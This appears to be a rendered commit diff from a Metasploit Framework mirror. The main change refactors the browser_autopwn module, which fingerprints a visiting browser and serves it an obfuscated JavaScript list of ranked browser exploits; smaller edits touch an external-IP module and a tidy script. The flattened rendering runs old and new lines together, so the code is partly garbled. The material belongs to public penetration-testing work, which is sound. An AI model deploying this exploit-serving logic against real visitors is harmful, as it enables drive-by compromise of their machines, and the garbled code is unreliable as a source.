infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' of https://github.com/rapid7/metasploit-framework

bug/bundler_fix
jvazquez-r7 2013-03-21 09:07:41 +01:00
parent 189abdc650 011b6899b0
commit b30a5aa6e8
3 changed files with 74 additions and 85 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
modules/auxiliary/gather/external_ip.rb
View File

@ -17,8 +17,13 @@ class Metasploit3 < Msf::Auxiliary
def initialize def initialize
super( super(
'Name' => 'External IP', 'Name' => 'Discover External IP via Ifconfig.me',
'Description' => 'This module checks for the public source IP address of the current route to the RHOST', 'Description' => %q{
This module checks for the public source IP address of the current
route to the RHOST by querying the public web application at ifconfig.me.
It should be noted this module will register activity on ifconfig.me,
which is not affiliated with Metasploit.
},
'Author' => ['RageLtMan'], 'Author' => ['RageLtMan'],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'References' => 'References' =>

58
modules/auxiliary/server/browser_autopwn.rb
View File

@ -385,8 +385,8 @@ class Metasploit3 < Msf::Auxiliary
def start_exploit_modules() def start_exploit_modules()
@lhost = (datastore['LHOST'] || "0.0.0.0") @lhost = (datastore['LHOST'] || "0.0.0.0")
@js_tests = {}
@noscript_tests = {} @noscript_tests = {}
@all_tests = {}
print_line print_line
print_status("Starting exploit modules on host #{@lhost}...") print_status("Starting exploit modules on host #{@lhost}...")
@ -446,20 +446,24 @@ class Metasploit3 < Msf::Auxiliary
end end
# Now that we've got all of our exploit tests put together, # Now that we've got all of our exploit tests put together,
# organize them into requires-scripting and # organize them into an all tests (JS and no-JS), organized by rank,
# doesnt-require-scripting, sorted by browser name. # and doesnt-require-scripting (no-JS), organized by browser name.
if apo[:javascript] && apo[:ua_name] if apo[:javascript] && apo[:ua_name]
@js_tests[apo[:ua_name]] ||= [] @all_tests[apo[:rank]] ||= []
@js_tests[apo[:ua_name]].push(apo) @all_tests[apo[:rank]].push(apo)
elsif apo[:javascript] elsif apo[:javascript]
@js_tests["generic"] ||= [] @all_tests[apo[:rank]] ||= []
@js_tests["generic"].push(apo) @all_tests[apo[:rank]].push(apo)
elsif apo[:ua_name] elsif apo[:ua_name]
@noscript_tests[apo[:ua_name]] ||= [] @noscript_tests[apo[:ua_name]] ||= []
@noscript_tests[apo[:ua_name]].push(apo) @noscript_tests[apo[:ua_name]].push(apo)
@all_tests[apo[:rank]] ||= []
@all_tests[apo[:rank]].push(apo)
else else
@noscript_tests["generic"] ||= [] @noscript_tests["generic"] ||= []
@noscript_tests["generic"].push(apo) @noscript_tests["generic"].push(apo)
@all_tests[apo[:rank]] ||= []
@all_tests[apo[:rank]].push(apo)
end end
end end
@ -501,9 +505,8 @@ class Metasploit3 < Msf::Auxiliary
print_line print_line
# Sort the tests by reliability, descending. # Sort the tests by reliability, descending.
@js_tests.each { |browser,tests| # I don't like doing this directly (wihout a !), but any other sort wasn't sticking - NE
tests.sort! {|a,b| b[:rank] <=> a[:rank]} @all_tests = @all_tests.sort.reverse
}
# This matters a lot less for noscript exploits since they basically # This matters a lot less for noscript exploits since they basically
# get thrown into a big pile of iframes that the browser will load # get thrown into a big pile of iframes that the browser will load
@ -511,7 +514,6 @@ class Metasploit3 < Msf::Auxiliary
@noscript_tests.each { |browser,tests| @noscript_tests.each { |browser,tests|
tests.sort! {|a,b| b[:rank] <=> a[:rank]} tests.sort! {|a,b| b[:rank] <=> a[:rank]}
} }
end end
# #
@ -746,7 +748,10 @@ class Metasploit3 < Msf::Auxiliary
# if we have no client_info, this will add all tests. Otherwise tries # if we have no client_info, this will add all tests. Otherwise tries
# to only send tests for exploits that target the client's detected # to only send tests for exploits that target the client's detected
# browser. # browser.
@js_tests.each { |browser, sploits|
@all_tests.each { |rank, sploits|
sploits.each { |s|
browser = s[:ua_name] || "generic"
next unless client_matches_browser(client_info, browser) next unless client_matches_browser(client_info, browser)
# Send all the generics regardless of what the client is. If the # Send all the generics regardless of what the client is. If the
@ -754,8 +759,8 @@ class Metasploit3 < Msf::Auxiliary
# on the side of shells and send everything. Otherwise, send only # on the side of shells and send everything. Otherwise, send only
# if the client is using the browser associated with this set of # if the client is using the browser associated with this set of
# exploits. # exploits.
if s[:javascript]
if (browser == "generic" || client_info.nil? || [nil, browser].include?(client_info[:ua_name])) if (browser == "generic" || client_info.nil? || [nil, browser].include?(client_info[:ua_name]))
sploits.each do |s|
if s[:vuln_test].nil? or s[:vuln_test].empty? if s[:vuln_test].nil? or s[:vuln_test].empty?
test = "is_vuln = true" test = "is_vuln = true"
else else
@ -777,6 +782,7 @@ class Metasploit3 < Msf::Auxiliary
end end
end end
end end
js << "global_exploit_list[global_exploit_list.length] = {\n" js << "global_exploit_list[global_exploit_list.length] = {\n"
js << " 'test':'#{test}',\n" js << " 'test':'#{test}',\n"
js << " 'resource':'#{res}'\n" js << " 'resource':'#{res}'\n"
@ -784,17 +790,7 @@ class Metasploit3 < Msf::Auxiliary
sploits_for_this_client.push s[:name] sploits_for_this_client.push s[:name]
sploit_cnt += 1 sploit_cnt += 1
end end
end else
}
# Add a javaEnabled() test specifically for java exploits. Other
# exploits that don't require javascript go into a big pile of iframes
# that will be dumped out after other exploitation is done, assuming
# the browser didn't stop somewhere along the way due to a successful
# exploit or a crash from all the memory raping we just did.
noscript_html = ""
@noscript_tests.each { |browser, sploits|
sploits.each do |s|
if s[:name] =~ %r|/java_| if s[:name] =~ %r|/java_|
res = exploit_resource(s[:name]).gsub("\n",'').gsub("'", "\\\\'") res = exploit_resource(s[:name]).gsub("\n",'').gsub("'", "\\\\'")
js << "global_exploit_list[global_exploit_list.length] = {\n" js << "global_exploit_list[global_exploit_list.length] = {\n"
@ -810,18 +806,7 @@ class Metasploit3 < Msf::Auxiliary
sploit_cnt += 1 sploit_cnt += 1
end end
} }
}
# If all of our exploits that require javascript fail, try to continue
# with those that don't
js << %Q|var noscript_exploits = "|
js << Rex::Text.to_hex(noscript_html, "%")
js << %Q|";\n|
js << %Q|var noscript_div = document.createElement("div");\n|
# Have to use innerHTML here to render the new iframes. Using
# document.createElement and appendChild() will escape all the
# entities.
js << %Q|noscript_div.innerHTML = unescape(noscript_exploits);\n|
js << %Q|document.body.appendChild(noscript_div);\n|
js << "#{js_debug("'starting exploits (' + global_exploit_list.length + ' total)<br>'")}\n" js << "#{js_debug("'starting exploits (' + global_exploit_list.length + ' total)<br>'")}\n"
js << "window.next_exploit(0);\n" js << "window.next_exploit(0);\n"
@ -830,7 +815,6 @@ class Metasploit3 < Msf::Auxiliary
js.obfuscate unless datastore["DEBUG"] js.obfuscate unless datastore["DEBUG"]
response.body = "#{js}" response.body = "#{js}"
print_status("Responding with #{sploit_cnt} exploits") print_status("Responding with #{sploit_cnt} exploits")
sploits_for_this_client.each do |name| sploits_for_this_client.each do |name|
vprint_status("* #{name}") vprint_status("* #{name}")

2
tools/msftidy.rb
View File

@ -277,7 +277,7 @@ class Msftidy
if @source =~ /'Name'[[:space:]]*=>[[:space:]]*['"](.+)['"],*$/ if @source =~ /'Name'[[:space:]]*=>[[:space:]]*['"](.+)['"],*$/
words = $1.split words = $1.split
words.each do |word| words.each do |word|
if %w{and or the for to in of as with a an on at}.include?(word) if %w{and or the for to in of as with a an on at via}.include?(word)
next next
elsif %w{pbot}.include?(word) elsif %w{pbot}.include?(word)
elsif word =~ /^[a-z]+$/ elsif word =~ /^[a-z]+$/